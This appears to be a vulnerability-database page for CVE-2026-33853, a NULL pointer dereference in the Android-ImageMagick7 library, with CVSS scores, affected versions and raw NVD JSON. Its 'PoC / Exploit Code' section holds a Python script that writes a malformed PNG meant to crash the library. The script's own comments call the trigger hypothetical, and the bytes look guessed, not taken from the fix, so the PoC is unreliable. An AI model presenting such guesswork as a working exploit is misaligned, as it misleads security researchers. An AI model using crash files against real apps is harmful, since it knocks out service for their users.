Security Vulnerability Report
中文
CVE-2026-33853 CVSS 5.5 MEDIUM

CVE-2026-33853

Published: 2026-03-24 06:16:23
Last Modified: 2026-03-26 19:31:08

Description

NULL Pointer Dereference vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-10.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:* - VULNERABLE
MolotovCherry Android-ImageMagick7 < 7.1.2-10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Generator for NULL Pointer Dereference # This script creates a malformed image file intended to trigger the crash def create_malformed_png(filename): png_signature = b'\x89PNG\r\n\x1a\n' # A minimal chunk structure that might bypass basic checks but fail deep parsing # leading to the NULL pointer dereference in < 7.1.2-10 chunk_len = b'\x00\x00\x00\x0d' # Length 13 chunk_type = b'IHDR' # Corrupted IHDR data chunk_data = b'\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00' chunk_crc = b'\x1f\x15\xc4\x89' with open(filename, 'wb') as f: f.write(png_signature) f.write(chunk_len) f.write(chunk_type) f.write(chunk_data) f.write(chunk_crc) # Append a second malformed chunk to trigger parsing logic # This is a hypothetical trigger based on the vulnerability description f.write(b'\x00\x00\x00\x00') f.write(b'NULL') f.write(b'\x00\x00\x00\x00') if __name__ == "__main__": print("Generating PoC image file...") create_malformed_png("crash_poc.png") print("Done. Load 'crash_poc.png' with the vulnerable app to test.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33853", "sourceIdentifier": "[email protected]", "published": "2026-03-24T06:16:22.517", "lastModified": "2026-03-26T19:31:07.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NULL Pointer Dereference vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-10."}, {"lang": "es", "value": "Vulnerabilidad de desreferencia de puntero NULL en MolotovCherry Android-ImageMagick7. Este problema afecta a Android-ImageMagick7: antes de 7.1.2-10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-10", "matchCriteriaId": "B4AB32B2-8459-4A61-A03E-FD0368E6CD9E"}]}]}], "references": [{"url": "https://github.com/MolotovCherry/Android-ImageMagick7/pull/183", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}